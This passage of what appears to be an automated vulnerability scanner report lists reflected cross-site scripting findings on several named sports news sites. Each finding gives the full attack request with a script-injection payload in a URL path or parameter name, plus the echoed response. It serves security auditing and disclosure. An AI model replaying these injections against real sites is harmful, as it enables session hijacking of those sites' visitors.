GET /pages/landing2?f9d02"><script>alert(1)</script>29dc0cc948d=1 HTTP/1.1 Host: www.csnnw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=201742339.1292783244.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=c8f0f9b5d04b6070c714e4d5bd8f9c4a; __utma=201742339.733990484.1292783244.1292783244.1292783244.1; __utmc=201742339; __utmb=201742339;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 20663 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:32:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:32:52 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!-- web3.platformic.com --> <meta http-equiv="Content-Type" content="t ...[SNIP]... <input type=hidden name="f9d02"><script>alert(1)</script>29dc0cc948d" id = "f9d02"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8cdcb<script>alert(1)</script>661668aa0e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages8cdcb<script>alert(1)</script>661668aa0e6/main HTTP/1.1 Host: www.csnnw.com Proxy-Connection: keep-alive Referer: http://www.csnnw.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:37:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:37:55 GMT Connection: close Content-Length: 754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pages8cdcb<script>alert(1)</script>661668aa0e6/main"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 47ca6<script>alert(1)</script>62b1953de4a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/main47ca6<script>alert(1)</script>62b1953de4a HTTP/1.1 Host: www.csnnw.com Proxy-Connection: keep-alive Referer: http://www.csnnw.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:37:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:37:55 GMT Connection: close Content-Length: 773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/main47ca6<script>alert(1)</script>62b1953de4a"</strong> ...[SNIP]...
2.387. http://www.csnnw.com/pages/main [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnnw.com
Path:
/pages/main
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 430da"><script>alert(1)</script>df368c64873 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/main?430da"><script>alert(1)</script>df368c64873=1 HTTP/1.1 Host: www.csnnw.com Proxy-Connection: keep-alive Referer: http://www.csnnw.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Set-Cookie: PHPSESSID=b74dbfc4beaa0a52e9b01f317379504e; path=/ Vary: Accept-Encoding Expires: Sun, 19 Dec 2010 18:37:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:37:55 GMT Connection: close Content-Length: 30241
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!-- web1.platformic.com --> <meta http-equiv="Content-Type" content="t ...[SNIP]... <input type=hidden name="430da"><script>alert(1)</script>df368c64873" id = "430da"> ...[SNIP]...
2.388. http://www.csnphilly.com/pages/pieceoftheaction [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnphilly.com
Path:
/pages/pieceoftheaction
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3eff8"><script>alert(1)</script>1fab6110a99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/pieceoftheaction?3eff8"><script>alert(1)</script>1fab6110a99=1 HTTP/1.1 Host: www.csnphilly.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1292783247.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_371fe082cd8f81613d5b8cd9b4b6f372=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=32252f2d10a66f5d238cc24ea19b0d85; __utma=1.184438490.1292783247.1292783247.1292783247.1; __utmc=1; base_domain_371fe082cd8f81613d5b8cd9b4b6f372=www.csnphilly.com; __utmb=1;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 34650 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:18 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="3eff8"><script>alert(1)</script>1fab6110a99" id = "3eff8"> ...[SNIP]...
2.389. http://www.csnphilly.com/pages/video [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnphilly.com
Path:
/pages/video
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caf91"><script>alert(1)</script>0bebc40a1f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/video?caf91"><script>alert(1)</script>0bebc40a1f2=1 HTTP/1.1 Host: www.csnphilly.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1292783247.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fbsetting_371fe082cd8f81613d5b8cd9b4b6f372=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; PHPSESSID=32252f2d10a66f5d238cc24ea19b0d85; __utma=1.184438490.1292783247.1292783247.1292783247.1; __utmc=1; base_domain_371fe082cd8f81613d5b8cd9b4b6f372=www.csnphilly.com; __utmb=1;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 60623 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:17 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:17 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="caf91"><script>alert(1)</script>0bebc40a1f2" id = "caf91"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e4747<script>alert(1)</script>81e3b388902 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/16/10/Ginobilis-UFO-Sighting-Explained/landing_word_bball.htmle4747<script>alert(1)</script>81e3b388902 HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:09 GMT Content-Length: 825 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/16/10/Ginobilis-UFO-Sighting-Explained/landing_word_bball.htmle4747<script>alert(1)</script>81e3b388902"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e72ae<script>alert(1)</script>69aa27d8c3d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Caps-Green-Were-going-to-be-alright/landing.htmle72ae<script>alert(1)</script>69aa27d8c3d HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:11 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:11 GMT Content-Length: 817 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Caps-Green-Were-going-to-be-alright/landing.htmle72ae<script>alert(1)</script>69aa27d8c3d"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 86e44<script>alert(1)</script>ee28401b9af was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/McNabb-benched-Grossman-to-start-Sunday/landing.html86e44<script>alert(1)</script>ee28401b9af HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:13 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:13 GMT Content-Length: 821 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/McNabb-benched-Grossman-to-start-Sunday/landing.html86e44<script>alert(1)</script>ee28401b9af"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 810eb<script>alert(1)</script>463820b7e21 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/McNabb-benched-Grossman-to-start-vs-Dall/landing.html810eb<script>alert(1)</script>463820b7e21 HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:14 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:14 GMT Content-Length: 822 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/McNabb-benched-Grossman-to-start-vs-Dall/landing.html810eb<script>alert(1)</script>463820b7e21"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ae2e4<script>alert(1)</script>694e29fae1f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/McSorley-Named-Dirtiest-Player-Ever/landing_word_hockey.htmlae2e4<script>alert(1)</script>694e29fae1f HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:17 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:17 GMT Content-Length: 829 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/McSorley-Named-Dirtiest-Player-Ever/landing_word_hockey.htmlae2e4<script>alert(1)</script>694e29fae1f"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1cf9f<script>alert(1)</script>910529ad9b0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Redskins-Grossman-ready-for-opportunity/landing.html1cf9f<script>alert(1)</script>910529ad9b0 HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:16 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:16 GMT Content-Length: 821 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Redskins-Grossman-ready-for-opportunity/landing.html1cf9f<script>alert(1)</script>910529ad9b0"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 602eb<script>alert(1)</script>b4485f03e1a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Report-Friedgen-accepts-Marylands-buy-ou/landing.html602eb<script>alert(1)</script>b4485f03e1a HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:12:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:12:08 GMT Content-Length: 822 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Report-Friedgen-accepts-Marylands-buy-ou/landing.html602eb<script>alert(1)</script>b4485f03e1a"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 73813<script>alert(1)</script>f903369748a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Suggs-Brees-is-Better-Than-Brady/landing_word_fball.html73813<script>alert(1)</script>f903369748a HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:18 GMT Content-Length: 825 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Suggs-Brees-is-Better-Than-Brady/landing_word_fball.html73813<script>alert(1)</script>f903369748a"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6c865<script>alert(1)</script>eb6007e3c23 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/17/10/Vick-says-he-would-like-a-pet-dog/wordonthestreet.html6c865<script>alert(1)</script>eb6007e3c23 HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:23 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:23 GMT Content-Length: 823 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/17/10/Vick-says-he-would-like-a-pet-dog/wordonthestreet.html6c865<script>alert(1)</script>eb6007e3c23"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ead3c<script>alert(1)</script>3aa3c2fdf71 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/18/10/Beninati-Fault-in-first/landing_joeb.htmlead3c<script>alert(1)</script>3aa3c2fdf71 HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:26 GMT Content-Length: 810 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/18/10/Beninati-Fault-in-first/landing_joeb.htmlead3c<script>alert(1)</script>3aa3c2fdf71"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 83bb0<script>alert(1)</script>79422940834 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/18/10/Bruins-score-3-quickly-hold-on-to-beat-C/landing.html83bb0<script>alert(1)</script>79422940834 HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:18 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:18 GMT Content-Length: 822 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/18/10/Bruins-score-3-quickly-hold-on-to-beat-C/landing.html83bb0<script>alert(1)</script>79422940834"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8acb1<script>alert(1)</script>e73e011d7b7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/18/10/Hanrahan-Arenas-trade-was-long-overdue/landing.html8acb1<script>alert(1)</script>e73e011d7b7 HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:12:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:12:06 GMT Content-Length: 820 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/18/10/Hanrahan-Arenas-trade-was-long-overdue/landing.html8acb1<script>alert(1)</script>e73e011d7b7"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ec6c7<script>alert(1)</script>b553b5c0c13 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.htmlec6c7<script>alert(1)</script>b553b5c0c13 HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:19 GMT Content-Length: 820 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/19/10/RB-Ivory-inactive-for-Saints-vs-Ravens/landing.htmlec6c7<script>alert(1)</script>b553b5c0c13"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 763a2<script>alert(1)</script>4ec1fcfca34 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Redskins-Cowboys-game-chat-on-now/landing.html763a2<script>alert(1)</script>4ec1fcfca34 HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:25 GMT Content-Length: 815 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/19/10/Redskins-Cowboys-game-chat-on-now/landing.html763a2<script>alert(1)</script>4ec1fcfca34"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c48ff<script>alert(1)</script>94c169c9d81 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.htmlc48ff<script>alert(1)</script>94c169c9d81 HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:26 GMT Content-Length: 822 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/19/10/Thomas-leads-No-11-SDSU-to-90-64-win-ove/landing.htmlc48ff<script>alert(1)</script>94c169c9d81"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload df301<script>alert(1)</script>d8187e7500b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.htmldf301<script>alert(1)</script>d8187e7500b HTTP/1.1 Host: www.csnwashington.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=ee6ea4d98cf6428b0b8b15daa0e5f9a3;
Response
